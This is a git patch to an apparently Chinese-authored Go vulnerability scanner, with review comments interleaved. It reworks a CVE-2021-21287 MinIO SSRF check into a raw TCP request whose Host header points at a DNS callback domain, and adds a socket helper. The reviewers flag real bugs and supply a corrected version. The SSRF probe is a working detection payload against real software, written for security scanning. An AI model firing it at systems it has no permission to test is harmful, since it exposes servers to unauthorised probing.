From 20af669f43a0e98cce6a67a73439734bf189e618 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=82=A0=E5=93=89?= <2086189633@qq.com> Date: Sun, 30 Jan 2022 16:05:03 +0800 Subject: [PATCH] =?UTF-8?q?=E4=BC=98=E5=8C=96=E4=BB=A3=E7=A0=81=E7=BB=93?= =?UTF-8?q?=E6=9E=84?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- active/poc/CVE-2021-21287.go | 30 ++++++-------- active/pocScan.go | 3 +- main.go | 14 +++++++ util/util.go | 77 ++++++++++++++++++++++++++++++++---- 4 files changed, 97 insertions(+), 27 deletions(-) diff --git a/active/poc/CVE-2021-21287.go b/active/poc/CVE-2021-21287.go index bf6ae63..dc714f2 100644 --- a/active/poc/CVE-2021-21287.go +++ b/active/poc/CVE-2021-21287.go @@ -1,8 +1,7 @@ package poc import ( - "net/http" - "strings" + "fmt" "youzai/util" ) 
@@ -26,26 +25,23 @@ func (Info *PocInfo) CVE_2021_21287_Init() { poc.Config.Proxy = PocCustomize.Config.Proxy poc.Config.Proxy_Url = PocCustomize.Config.Proxy_Url - // 生成http客户端 - cli := util.Http_Client(poc.Config.Timeout, poc.Config.Proxy, poc.Config.Proxy_Url) - // 编写自定义检测函数,返回值有两个,第一个是判断是否存在存在漏洞,第二个参数返回响应状态码 poc.Config.Check = func() (bool, int) { pocData := `{"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"}` randstr, ceye_url := util.Get_Ceye() - request, err := http.NewRequest("POST", poc.Config.Url+"/minio/webrpc", strings.NewReader(pocData)) - if err != nil { - return false, 0 - } - request.Host = ceye_url - request.Header.Set("Content-Type", "application/json") - if response, err := cli.Do(request); err != nil { - return false, 0 - } else { - if util.Ceye_Check(randstr) { - return true, response.StatusCode - } + tcpData := "POST /minio/webrpc HTTP/1.1\r\n" + tcpData += fmt.Sprintf("Host: %s\r\n", ceye_url) + tcpData += poc.Config.User_Agent + "\r\n" + tcpData += "Content-Type: application/json\r\n" + tcpData += "Content-Length: 76\r\n" + tcpData += "Connection: close\r\n\r\n" + tcpData += pocData + + _, code := util.Tcp_Send(poc.Config.Url, tcpData, 10) + success := util.Ceye_Check(randstr) + if success { + return true, code } return false, 0 } diff --git a/active/pocScan.go b/active/pocScan.go index 2a0dfe5..9b7bfa9 100644 --- a/active/pocScan.go +++ b/active/pocScan.go @@ -88,7 +88,6 @@ func Scanning_Panel(wg *sync.WaitGroup) { green := color.FgGreen.Render blue := color.FgBlue.Render yellow := color.FgYellow.Render - cyan := color.FgCyan.Render is_Stop := false for { if is_Stop { 
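Review bot: The switch from the proxied http.Client to `util.Tcp_Send(poc.Config.Url, tcpData, 10)` silently bypasses the proxy: the context lines still copy poc.Config.Proxy and poc.Config.Proxy_Url into the PoC, but Tcp_Send takes neither, so with a proxy configured the POST now goes straight to the target from the scanner's own address, and poc.Config.Timeout is replaced by a literal 10. The hard-coded `Content-Length: 76` also does not match pocData, which by my count is 75 bytes, so a strict server waits for a byte that never arrives until its own read timeout fires; derive it instead: `tcpData += fmt.Sprintf("Content-Length: %d\r\n", len(pocData))`. I cannot tell from here whether poc.Config.User_Agent already carries the `User-Agent: ` prefix; if it is the bare product string, that header line is malformed. The enclosing CVE_2021_21287_Init starts before this hunk.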
@@ -98,7 +97,7 @@ func Scanning_Panel(wg *sync.WaitGroup) { for i := 0; i < len(Scanning); i++ { numtemp, _ := strconv.ParseFloat(fmt.Sprintf("%.2f", float64(Scan_Num)/float64(Scan_Num_True)), 64) num := int(numtemp * 50) - color.Print(green("[INFO]"), blue(Scanning[i]), yellow(" <["), cyan(strings.Repeat("■", num)), strings.Repeat(" ", 50-num), yellow("]> "), int(numtemp*100), "%", "\r") + color.Print(green("[INFO]"), blue(Scanning[i]), yellow(" <["), strings.Repeat("■", num), strings.Repeat(" ", 50-num), yellow("]> "), int(numtemp*100), "%", "\r") time.Sleep(time.Millisecond * 100) if num == 50 { after := time.Now().Unix() diff --git a/main.go b/main.go index 6948b94..ea6b647 100644 --- a/main.go +++ b/main.go @@ -2,6 +2,9 @@ package main import ( "flag" + "fmt" + "os" + "os/signal" "strings" "time" "youzai/active" @@ -63,6 +66,16 @@ func usage_info() { color.Cyanln(h) } +func active_interrupt() { + sigChan := make(chan os.Signal, 1) + signal.Notify(sigChan, os.Interrupt) + sig := <-sigChan + _ = sig + fmt.Println() + color.Println("[EXIT]", "The Scan Stop Because Of User Interrupt") + os.Exit(0) +} + // 执行扫描 func active_Check(vuln_type string) { // 检查是否使用代理 @@ -118,5 +131,6 @@ func config_info() { // 扫描器入口 func main() { + go active_interrupt() config_info() } diff --git a/util/util.go b/util/util.go index 856df72..76ec0fc 100644 --- a/util/util.go +++ b/util/util.go @@ -5,9 +5,12 @@ import ( "fmt" "io/ioutil" "math/rand" + "net" "net/http" "net/http/httptrace" "net/url" + "regexp" + "strconv" "strings" "time" @@ -25,6 +28,15 @@ type Ceye_Info struct { var Ceye = Ceye_Info{} +// 获取ceye随机数和域名 +func Get_Ceye() (randstr, ceye_url string) { + rand.Seed(time.Now().UnixNano()) + t := rand.Intn(100000) + randstr = fmt.Sprintf("%d", t) + ceye_url = randstr + "." + Ceye.Ceye_Url + return randstr, ceye_url +} + // 用于检测ssrf的函数 func Ceye_Check(randstr string) bool { red := color.Red.Render 
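Review bot: active_interrupt reports a user abort with `os.Exit(0)`, so a script driving the scanner cannot tell an interrupted run from a completed one; exit non-zero (130 is the conventional SIGINT status) and, if a result file or summary is written at the end of a scan, flush it first, because os.Exit skips deferred cleanup — whether such output exists is not visible in this hunk. The `sig := <-sigChan` / `_ = sig` pair is just `<-sigChan`. Only os.Interrupt is caught; if the tool is also run under a supervisor that sends SIGTERM, register `syscall.SIGTERM` in signal.Notify as well so both paths print the same exit message.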
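Review bot: Get_Ceye draws the DNS callback token from math/rand with `rand.Intn(100000)`, reseeded from the wall clock on every call: that is at most five decimal digits, predictable from the scan time, and two goroutines seeding within the same UnixNano tick get the same token. If Ceye_Check looks that token up in the account's shared DNS log (inferred from the name; its body is outside the hunk), a stale hit from an earlier run or a concurrent target that drew the same token is reported as a confirmed vulnerability on the wrong host. Use an unguessable, wide token instead, e.g. `b := make([]byte, 8); _, _ = cryptorand.Read(b); randstr = hex.EncodeToString(b)` with crypto/rand and encoding/hex, and drop the per-call `rand.Seed`. The function is moved rather than new, but this is the place to fix it.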
@@ -71,6 +83,63 @@ func Http_Client(timeout int, proxy bool, proxy_url string) *http.Client { return cli } +// 使用tcp发送数据 +func Tcp_Send(target_url string, data string, timeout int) (response_data string, response_code int) { + reg := regexp.MustCompile(`.*(\d{3}).*`) + urli := url.URL{} + url, _ := urli.Parse(target_url) + switch url.Scheme { + case "http": + var host = url.Host + if !strings.Contains(host, ":") { + host = url.Host + ":80" + } + net, err := net.DialTimeout("tcp", host, time.Second*time.Duration(timeout)) + if err != nil { + color.Println("[WARNING]", err) + } + defer net.Close() + _, _ = net.Write([]byte(data)) + buf := make([]byte, 20480) + n, err := net.Read(buf) + if err != nil { + color.Println("[WARNING]", err) + } + result := reg.FindStringSubmatch(string(buf[:n])) + if len(result) != 0 { + code, _ := strconv.Atoi(result[len(result)-1]) + return string(buf[:n]), code + } + return "", 0 + + case "https": + conf := &tls.Config{ + InsecureSkipVerify: false, + } + var host = url.Host + if !strings.Contains(host, ":") { + host = url.Host + ":443" + } + net, err := tls.Dial("tcp", host, conf) + if err != nil { + color.Println("[WARNING]", err) + } + defer net.Close() + _, _ = net.Write([]byte(data)) + buf := make([]byte, 20480) + n, err := net.Read(buf) + if err != nil { + color.Println("[WARNING]", err) + } + result := reg.FindStringSubmatch(string(buf[:n])) + if len(result) != 0 { + code, _ := strconv.Atoi(result[len(result)-1]) + return string(buf[:n]), code + } + } + return "", 0 +} + // 检测网络连通性 func Net_Check(url string) bool { green := color.FgGreen.Render @@ -104,11 +173,3 @@ func Net_Check(url string) bool { return true } } - -func Get_Ceye() (randstr, ceye_url string) { - rand.Seed(time.Now().UnixNano()) - t := rand.Intn(100000) - randstr = fmt.Sprintf("%d", t) - ceye_url = randstr + "." + Ceye.Ceye_Url - return randstr, ceye_url -}
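Review bot: Tcp_Send keeps going after a failed dial: on error it only logs a warning, then runs `defer net.Close()` and `net.Write` on a nil connection, which panics and takes the whole scanner down for any unreachable target — both branches need `return "", 0` after the warning. The https branch also drops the timeout entirely (`tls.Dial` takes no deadline), and neither branch sets a read deadline, so a target that accepts the connection and never answers blocks the goroutine forever; `tls.DialWithDialer` with a `net.Dialer{Timeout: …}` plus `conn.SetDeadline` fixes both. Smaller points: `url, _ := urli.Parse(...)` ignores the parse error (nil dereference on a malformed URL) and shadows the `url` package, `net, err := net.DialTimeout(...)` shadows `net`, `strings.Contains(host, ":")` misclassifies IPv6 literals, and the unanchored `.*(\d{3}).*` picks up any three digits on the first line rather than the status code — anchoring it to `^HTTP/\d\.\d (\d{3})` and compiling it once at package scope is both cheaper and safer. Rewritten below.
```go
// statusLine matches the first line of an HTTP/1.x response; compiled once.
var statusLine = regexp.MustCompile(`^HTTP/\d\.\d (\d{3})`)

// withDefaultPort appends port unless host already carries one (IPv6-safe).
func withDefaultPort(host, port string) string {
	if _, _, err := net.SplitHostPort(host); err != nil {
		return net.JoinHostPort(host, port)
	}
	return host
}

func Tcp_Send(target_url string, data string, timeout int) (response_data string, response_code int) {
	u, err := url.Parse(target_url)
	if err != nil {
		color.Println("[WARNING]", err)
		return "", 0
	}
	wait := time.Second * time.Duration(timeout)
	dialer := &net.Dialer{Timeout: wait}
	var conn net.Conn
	switch u.Scheme {
	case "http":
		conn, err = dialer.Dial("tcp", withDefaultPort(u.Host, "80"))
	case "https":
		// the dialer timeout now covers the TCP connect and the TLS handshake
		conn, err = tls.DialWithDialer(dialer, "tcp", withDefaultPort(u.Host, "443"), &tls.Config{InsecureSkipVerify: false})
	default:
		return "", 0
	}
	if err != nil {
		color.Println("[WARNING]", err)
		return "", 0 // conn is nil here; never Write/Close it
	}
	defer conn.Close()
	// bound the write and the read too, or a silent target hangs the scan
	_ = conn.SetDeadline(time.Now().Add(wait))
	if _, err := conn.Write([]byte(data)); err != nil {
		color.Println("[WARNING]", err)
		return "", 0
	}
	buf := make([]byte, 20480)
	n, err := conn.Read(buf)
	if n == 0 {
		if err != nil {
			color.Println("[WARNING]", err)
		}
		return "", 0
	}
	resp := string(buf[:n])
	if m := statusLine.FindStringSubmatch(resp); m != nil {
		code, _ := strconv.Atoi(m[1])
		return resp, code
	}
	return "", 0
}
```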